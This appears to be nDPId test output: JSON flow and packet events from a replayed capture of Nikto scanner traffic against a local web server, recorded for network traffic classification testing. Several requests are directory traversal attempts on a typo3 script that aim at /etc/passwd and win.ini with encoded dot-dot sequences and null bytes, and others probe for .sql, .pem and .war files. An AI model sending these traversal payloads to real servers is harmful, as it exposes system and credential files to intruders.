-00790{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1576420276844,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1576420276844,"pkt":"AAAAAAAAAAAAAAAACABFAAEdYctAAEAG2g1\/AAABfwAAAcJyH5D8wFnzKu6RnoAYAED\/EQAAAQEICp1m+5SdZvuUR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvd2luZG93cy93aW4uaW5pJTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KDQo="} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7440000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on 
Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/windows\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7440000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1576420276847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"thread_ts_msec":1576420276847,"pkt":"AAAAAAAAAAAAAAAACABFAAEYOOhAAEAGAvZ\/AAABfwAAAcJ0H5DjgwDevH40fYAYAED\/DAAAAQEICp1m+5adZvuWR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvZXRjL3Bhc3N3ZCUwMCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RGlyZWN0b3J5IHRyYXZlcnNhbCBjaGVjaykNCg0K"} 
-01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7440000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1576420276856,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276856,"pkt":"AAAAAAAAAAAAAAAACABFAADBvW9AAEAGfsV\/AAABfwAAAcJ2H5DTj4VUAEbtioAYAED+tQAAAQEICp1m+6CdZvugR0VUIC8xMjcwMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1576420276858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276858,"pkt":"AAAAAAAAAAAAAAAACABFAADB2xVAAEAGYR9\/AAABfwAAAcJ4H5D77OMujr7QhoAYAED+tQAAAQEICp1m+6KdZvuiR0VUIC8xMjcwMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1576420276859,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276859,"pkt":"AAAAAAAAAAAAAAAACABFAADApHlAAEAGl7x\/AAABfwAAAcJ6H5CcwpxJV58CXYAYAED+tAAAAQEICp1m+6OdZvujR0VUIC8xMjcwLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1576420276860,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276860,"pkt":"AAAAAAAAAAAAAAAACABFAADALy9AAEAGDQd\/AAABfwAAAcJ8H5ChphcTD1c5UYAYAED+tAAAAQEICp1m+6SdZvukR0VUIC8xMjcwLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1576420276862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276862,"pkt":"AAAAAAAAAAAAAAAACABFAAC9dyVAAEAGxRN\/AAABfwAAAcJ+H5ApDE8dFFMQVIAYAED+sQAAAQEICp1m+6WdZvulR0VUIC8xLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1576420276863,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276863,"pkt":"AAAAAAAAAAAAAAAACABFAAC9pJxAAEAGl5x\/AAABfwAAAcKAH5APfJymg2qZ5YAYAED+sQAAAQEICp1m+6edZvumR0VUIC8xLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1576420276864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276864,"pkt":"AAAAAAAAAAAAAAAACABFAADBqoBAAEAGkbR\/AAABfwAAAcKCH5Cxx5I\/tyTjW4AYAED+tQAAAQEICp1m+6idZvuoR0VUIC8xMjcuMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1576420276865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276865,"pkt":"AAAAAAAAAAAAAAAACABFAADBsWVAAEAGis9\/AAABfwAAAcKEH5CGGYkkbARgroAYAED+tQAAAQEICp1m+6mdZvupR0VUIC8xMjcuMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1576420276866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276866,"pkt":"AAAAAAAAAAAAAAAACABFAADBsTlAAEAGivt\/AAABfwAAAcKGH5CzxIl4Ool\/aIAYAED+tQAAAQEICp1m+6qdZvuqR0VUIC8xMjcuMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 